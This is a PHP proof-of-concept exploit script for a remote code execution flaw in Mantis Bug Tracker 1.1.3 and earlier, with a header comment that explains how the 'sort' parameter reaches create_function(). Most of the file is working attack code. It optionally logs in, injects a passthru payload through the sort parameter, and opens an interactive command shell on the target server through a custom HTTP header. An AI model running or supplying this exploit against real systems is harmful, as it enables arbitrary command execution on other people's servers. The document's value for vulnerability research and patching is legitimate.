<?php
/*
--------------------------------------------------------------------------------
Mantis Bug Tracker <= 1.1.3 (manage_proj_page.php) Remote Code Execution Exploit
--------------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.mantisbt.org/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /manage_proj_page.php
32. $f_sort = gpc_get_string( 'sort', 'name' ); <=== this is taken and stripslashed from $_GET['sort']
33. $f_dir = gpc_get_string( 'dir', 'ASC' );
(...)
89. $t_projects = multi_sort( $t_full_projects, $f_sort, $t_direction ); <=== and here is passed to multi_sort()
90. $t_stack = array( $t_projects );
[-] multi_sort() function defined into /core/utility_api.php
185. # --------------------
186. # Sort a multi-dimensional array by one of its keys
187. function multi_sort( $p_array, $p_key, $p_direction=ASCENDING ) {
188. if ( DESCENDING == $p_direction ) {
189. $t_factor = -1;
190. } else {
191. # might as well allow everything else to mean ASC rather than erroring
192. $t_factor = 1;
193. }
194.
195. $t_function = create_function( '$a, $b', "return $t_factor * strnatcasecmp( \$a['$p_key'], \$b['$p_key'] );" );
196. uasort( $p_array, $t_function );
197. return $p_array;
198. }
An attacker could be able to inject and execute PHP code through $_GET['sort'], that is passed to create_function()
at line 195 into multi_sort() function body. By default only registered users can access to manage_proj_page.php
(I've tested this on 1.1.3 version), because of this sometimes this PoC works only with a valid account.
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function check_login()
{
global $host, $path, $user, $pass, $cookie;
$packet = "GET {$path}manage_proj_page.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/Location: login_page.php/", http_send($host, $packet)))
{
if (isset($pass))
{
$payload = "username={$user}&password={$pass}";
$packet = "POST {$path}login.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID=".md5("foo")."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!preg_match("/Set-Cookie: (.*);/", http_send($host, $packet), $match)) die("\n[-] Login failed...\n");
$cookie = $match[1];
}
else die("\n[-] Credentials needed...\n");
}
}
print "\n+-------------------------------------------------------------------+";
print "\n| Mantis Bug Tracker <= 1.1.3 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path [user] [password]\n";
print "\nExample....: php $argv[0] localhost /mantis/";
print "\nExample....: php $argv[0] localhost / user pass\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
check_login();
$code = "']);}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}manage_proj_page.php?sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID=".md5("foo").(isset($cookie) ? "; {$cookie}" : "")."\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nmantis-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
?>